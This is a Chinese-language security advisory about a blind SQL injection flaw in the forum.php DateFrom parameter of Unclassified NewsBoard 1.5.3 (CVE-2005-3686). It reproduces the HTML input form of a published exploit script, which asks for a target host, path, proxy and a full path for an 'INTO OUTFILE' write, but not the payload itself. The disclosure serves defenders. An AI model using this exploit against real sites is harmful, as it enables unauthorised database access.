安全研究

安全漏洞
Unclassified NewsBoard forum.php远程SQL注入漏洞

发布日期:2005-11-12
更新日期:2005-11-12

受影响系统:
Unclassified NewsBoard Unclassified NewsBoard 1.5.3a
Unclassified NewsBoard Unclassified NewsBoard 1.5.3
描述:
BUGTRAQ  ID: 15466
CVE(CAN) ID: CVE-2005-3686

Unclassified NewsBoard是一款基于WEB的PHP编写的论坛程序。

Unclassified NewsBoard对用户提交给的参数缺少正确充分的过滤,远程攻击者可以利用此漏洞非授权操作数据库。

Unclassified NewsBoard的forum.php脚本对用户提交DateFrom参数数据缺少充分过滤,远程攻击者可以通过在输入数据中插入特定的SQL命令来非授权获取对数据库的访问。

<*来源:rgod (rgod@autistici.org
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<html><head><title> Unclassified  NewsBoard  1.5.3pl3  blind  SQL injection
</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css"> body {background-color:#111111;   SCROLLBAR-ARROW-COLOR:
#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color:  #1CB081; }  img
{background-color:   #FFFFFF   !important}  input  {background-color:    #303030
!important} option {  background-color:   #303030   !important}         textarea
{background-color: #303030 !important} input {color: #1CB081 !important}  option
{color: #1CB081 !important} textarea {color: #1CB081 !important}        checkbox
{background-color: #303030 !important} select {font-weight: normal;       color:
#1CB081;  background-color:  #303030;}  body  {font-size:  8pt       !important;
background-color:   #111111;   body * {font-size: 8pt !important} h1 {font-size:
0.8em !important}   h2   {font-size:   0.8em    !important} h3 {font-size: 0.8em
!important} h4,h5,h6    {font-size: 0.8em !important}  h1 font {font-size: 0.8em
!important}     h2 font {font-size: 0.8em !important}h3   font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;
color : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica,  sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica,  sans-serif;
font-weight:bold; font-style: italic;}--></style></head><body><p class="Stile6">
Unclassified  NewsBoard  1.5.3pl3  blind  SQL  injection </p><p class="Stile6">a
script  by  rgod  at        <a href="http://rgod.altervista.org"target="_blank">
http://rgod.altervista.org</a></p><table width="84%"><tr><td width="43%">  <form
name="form1"      method="post"   action="?path=value&host=
value&port=value&proxy=value"> <p> <input  type="text"  name="host">       <span
class="Stile5"> * hostname (ex: www.sitename.com) </span> </p> <p>        <input
type="text" name="path">   <span class="Stile5"> * path ( ex: /unb/  or just / )

</span></p><p> <input   type="text" name="fullpath"><span class="Stile5"> * full
path to site,  need  this for "INTO OUTFILE" statement (ex.: C:\\www\\site\\)
</span></p><p>   <input type="text" name="table_prefix">   <span class="Stile5">
specify a table  prefix other than the default (unb1_)</span>      </p><p><input
type="text"  name="port"> <span class="Stile5">specify  a  port  other  than  80
( default  value )  </span>  </p> <p>  <input  type="text"  name="proxy">  <span
class="Stile5">  send  exploit  through  an  HTTP proxy (ip:port) </span></p><p>

<input type="submit"name="Submit" value="go!"> </p> </form> </td> </tr> </table>
</body></html>Fill * requested fields, optionally specify a proxy...

建议:
厂商补丁:

Unclassified NewsBoard
----------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://newsboard.unclassified.de/

浏览次数:3865
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障